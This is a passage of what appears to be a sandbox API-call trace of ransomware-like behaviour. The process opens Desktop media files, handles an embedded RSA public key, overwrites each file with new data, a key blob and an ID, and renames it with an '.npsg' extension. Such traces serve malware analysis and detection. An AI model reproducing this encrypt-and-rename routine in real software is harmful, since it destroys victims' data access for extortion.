lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fd5890, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x57efe2c0, ftLastAccessTime.dwHighDateTime=0x1d5bf9c, ftLastWriteTime.dwLowDateTime=0x57efe2c0, ftLastWriteTime.dwHighDateTime=0x1d5bf9c, nFileSizeHigh=0x0, nFileSizeLow=0x4e81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arGlISI8EjKQOcA.mp4", cAlternateFileName="ARGLIS~1.MP4")) returned 1 [0236.085] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arGlISI8EjKQOcA.mp4") returned=".mp4" [0236.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arGlISI8EjKQOcA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arglisi8ejkqoca.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.085] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=20097) returned 1 [0236.085] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.088] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4e5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.088] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.089] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x4e81, lpOverlapped=0x0) returned 1 [0236.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.089] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.090] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.090] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.090] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.090] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.090] GetLastError () returned 0x0 [0236.091] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.091] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.091] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.091] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.091] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.091] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b9abd8 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b9abd8 | out: hHeap=0x620000) returned 1 [0236.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400008 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fffa8 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.092] GetCurrentThreadId () returned 0x5b4 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688120 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.093] GetCurrentThreadId () returned 0x5b4 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400008 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400068 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400080 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400020 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffa8 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94e88 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.097] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x4e7c, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x4e7c, lpOverlapped=0x0) returned 1 [0236.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.097] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4e81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.097] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0236.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0236.098] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.098] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.098] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.098] CloseHandle (hObject=0x644) returned 1 [0236.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b95d50 [0236.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.100] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arGlISI8EjKQOcA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arglisi8ejkqoca.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arGlISI8EjKQOcA.mp4.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arglisi8ejkqoca.mp4.npsg")) returned 1 [0236.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.101] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.103] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f71d290, ftCreationTime.dwHighDateTime=0x1d5c094, ftLastAccessTime.dwLowDateTime=0xd652ed0, ftLastAccessTime.dwHighDateTime=0x1d5bee9, ftLastWriteTime.dwLowDateTime=0xd652ed0, ftLastWriteTime.dwHighDateTime=0x1d5bee9, nFileSizeHigh=0x0, nFileSizeLow=0x12dfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BLK5--Ya.m4a", cAlternateFileName="")) returned 1 [0236.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.103] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BLK5--Ya.m4a") returned=".m4a" [0236.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BLK5--Ya.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\blk5--ya.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.103] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=77307) returned 1 [0236.103] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.106] SetFilePointerEx (in: 